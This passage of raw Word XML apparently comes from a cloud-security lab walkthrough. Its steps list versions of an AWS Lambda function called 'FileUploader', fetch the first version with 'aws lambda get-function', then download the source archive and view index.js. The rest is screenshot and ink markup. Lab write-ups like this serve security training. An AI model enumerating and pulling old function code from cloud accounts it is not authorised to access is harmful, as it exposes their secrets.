                    <w14:contentPart bwMode="auto" r:id="rId176">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="886680" cy="11160"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="7D3D7402" id="Ink 286" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:289pt;margin-top:301.15pt;width:78.3pt;height:17.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">
                <v:imagedata r:id="rId177" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251721728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43A7B154" wp14:editId="1B9E51AE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3715200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>567078</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1285560" cy="11160"/>
                <wp:effectExtent l="88900" t="139700" r="86360" b="141605"/>
                <wp:wrapNone/>
                <wp:docPr id="285" name="Ink 285"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId178">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1285560" cy="11160"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="30030AB2" id="Ink 285" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:288.3pt;margin-top:36.15pt;width:109.75pt;height:17.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">
                <v:imagedata r:id="rId179"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page35image66220224" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3009998B" wp14:editId="12FC4826">
            <wp:extent cx="5731510" cy="3611245"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="8255"/>
            <wp:docPr id="60" name="Picture 60" descr="page35image662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age35image662202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3611245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page35image66220432" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B544654" wp14:editId="4C6B2D2D">
            <wp:extent cx="5731510" cy="3373120"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="17780"/>
            <wp:docPr id="59" name="Picture 59" descr="page35image662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age35image6622043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373120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D03C5B9" w14:textId="69BDC682" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="000F0C98" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251723776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="307561F0" wp14:editId="424D3532">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3728160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>311979</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="960120" cy="3240"/>
                <wp:effectExtent l="88900" t="139700" r="81280" b="136525"/>
                <wp:wrapNone/>
                <wp:docPr id="287" name="Ink 287"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId182">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="960120" cy="3240"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1A607D15" id="Ink 287" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:289.35pt;margin-top:16.05pt;width:84.1pt;height:17.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">
                <v:imagedata r:id="rId183"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page36image66221264" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F420436" wp14:editId="28E2CE44">
            <wp:extent cx="5731510" cy="3595370"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="11430"/>
            <wp:docPr id="56" name="Picture 56" descr="page36image6622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age36image6622126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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C520FA" w14:textId="200FD874" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">There are three versions of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> Function, the $LATEST and version 2 are the same (CodeSha256 is same), version 1 is different. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF9423" w14:textId="77777777" w:rsidR="000F0C98" w:rsidRPr="0094232C" w:rsidRDefault="000F0C98" w:rsidP="0094232C"/>
    <w:p w14:paraId="13182945" w14:textId="77777777" w:rsidR="001F3CA3" w:rsidRDefault="0094232C" w:rsidP="0058333B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 44: ​Retrieve the source of the first version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>FileUploader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> Function. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198ED756" w14:textId="4ABEC1A8" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="001F3CA3">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lambda get-function --function-name FileUploader:1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8FCF45" w14:textId="77777777" w:rsidR="001F3CA3" w:rsidRDefault="001F3CA3" w:rsidP="0094232C"/>
    <w:p w14:paraId="17E7C0C8" w14:textId="090C5E71" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page36image66221472" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42A83C52" wp14:editId="7590B00C">
            <wp:extent cx="5731510" cy="1530350"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="19050"/>
            <wp:docPr id="55" name="Picture 55" descr="page36image6622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age36image6622147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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DB7786" w14:textId="7E71EF70" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="00545BC6" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251727872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="73FB857C" wp14:editId="0B622E67">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>64440</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3078125</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5475240" cy="126720"/>
                <wp:effectExtent l="127000" t="215900" r="151130" b="216535"/>
                <wp:wrapNone/>
                <wp:docPr id="291" name="Ink 291"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId186">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5475240" cy="126720"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="37D64E58" id="Ink 291" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:-2pt;margin-top:228.2pt;width:445.25pt;height:38.3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">
                <v:imagedata r:id="rId187" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251726848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05EF9899" wp14:editId="4AFBB007">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>78120</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3392765</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5540760" cy="117360"/>
                <wp:effectExtent l="127000" t="215900" r="149225" b="213360"/>
                <wp:wrapNone/>
                <wp:docPr id="290" name="Ink 290"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId188">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5540760" cy="117360"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1969BB9D" id="Ink 290" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:-.95pt;margin-top:253pt;width:450.5pt;height:37.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">
                <v:imagedata r:id="rId189" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251725824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1954F2C0" wp14:editId="60082086">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>104760</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2764565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5541120" cy="113400"/>
                <wp:effectExtent l="127000" t="215900" r="135890" b="217170"/>
                <wp:wrapNone/>
                <wp:docPr id="289" name="Ink 289"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId190">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5541120" cy="113400"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="51C32558" id="Ink 289" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:1.15pt;margin-top:203.55pt;width:450.45pt;height:37.3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">
                <v:imagedata r:id="rId191" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251724800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43C43CCF" wp14:editId="41AF1C40">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>427320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2512565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5322960" cy="73440"/>
                <wp:effectExtent l="88900" t="139700" r="87630" b="142875"/>
                <wp:wrapNone/>
                <wp:docPr id="288" name="Ink 288"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId192">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5322960" cy="73440"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="5AB67020" id="Ink 288" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:29.45pt;margin-top:189.35pt;width:427.65pt;height:22.8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">
                <v:imagedata r:id="rId193" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page37image66222304" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B819F91" wp14:editId="7C3EE407">
            <wp:extent cx="5731510" cy="3620770"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="11430"/>
            <wp:docPr id="52" name="Picture 52" descr="page37image6622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age37image6622230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3620770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E85125D" w14:textId="13BED07D" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">The Link to download the source code is present in the Location Attribute of Code section. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A510D46" w14:textId="77777777" w:rsidR="001F3CA3" w:rsidRPr="0094232C" w:rsidRDefault="001F3CA3" w:rsidP="0094232C"/>
    <w:p w14:paraId="6BAF15C5" w14:textId="2CDBECCC" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0058333B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 45: ​Download the source archive. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B369F3" w14:textId="1523EF5A" w:rsidR="00445766" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0058333B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 46: ​Extract the archive. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FA093F" w14:textId="55C0B678" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page38image66222928" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B43D42A" wp14:editId="6382CF31">
            <wp:extent cx="5731510" cy="1838325"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="15875"/>
            <wp:docPr id="48" name="Picture 48" descr="page38image6622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age38image662229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1838325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D419BF1" w14:textId="5D250364" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page39image66223344" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40405921" wp14:editId="197ED444">
            <wp:extent cx="5731510" cy="1835785"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="18415"/>
            <wp:docPr id="45" name="Picture 45" descr="page39image662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age39image6622334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1835785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF6CC13" w14:textId="77777777" w:rsidR="000D3E2D" w:rsidRDefault="000D3E2D" w:rsidP="0094232C"/>
    <w:p w14:paraId="0734EEFB" w14:textId="77777777" w:rsidR="000D3E2D" w:rsidRDefault="000D3E2D" w:rsidP="0094232C"/>
    <w:p w14:paraId="4421A117" w14:textId="77777777" w:rsidR="000D3E2D" w:rsidRDefault="000D3E2D" w:rsidP="0094232C"/>
    <w:p w14:paraId="29082F2A" w14:textId="14C0D114" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0058333B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 47:​ View the index.js file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A062417" w14:textId="6FFFFF72" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page39image66223552" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FA80C38" wp14:editId="122F5014">
            <wp:extent cx="5731510" cy="3486150"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="19050"/>
            <wp:docPr id="44" name="Picture 44" descr="page39image662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age39image6622355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3486150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF3C21E" w14:textId="77777777" w:rsidR="00676B3E" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page40image66243008" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21E037EE" wp14:editId="2A593ADE">
            <wp:extent cx="5731510" cy="3596640"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="10160"/>
            <wp:docPr id="41" name="Picture 41" descr="page40image662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age40image6624300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3596640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A36B49" w14:textId="0212F2A8" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page40image66242800" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31CE5711" wp14:editId="383248B9">
            <wp:extent cx="5731510" cy="1502410"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="8890"/>
            <wp:docPr id="40" name="Picture 40" descr="page40image6624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age40image6624280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1510" cy="1502410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D2BEAA" w14:textId="77777777" w:rsidR="00505E0D" w:rsidRDefault="00505E0D" w:rsidP="0094232C"/>
    <w:p w14:paraId="02F4D9A0" w14:textId="5EC98A7D" w:rsidR="00545BC6" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
